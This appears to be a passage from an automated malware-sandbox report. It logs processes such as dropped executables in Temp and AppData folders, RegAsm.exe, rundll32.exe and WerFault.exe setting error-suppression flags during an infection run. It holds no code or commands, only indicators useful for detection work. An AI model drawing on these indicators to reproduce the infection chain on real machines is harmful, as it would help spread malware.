Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Process information set: NOOPENFILEERRORBOX
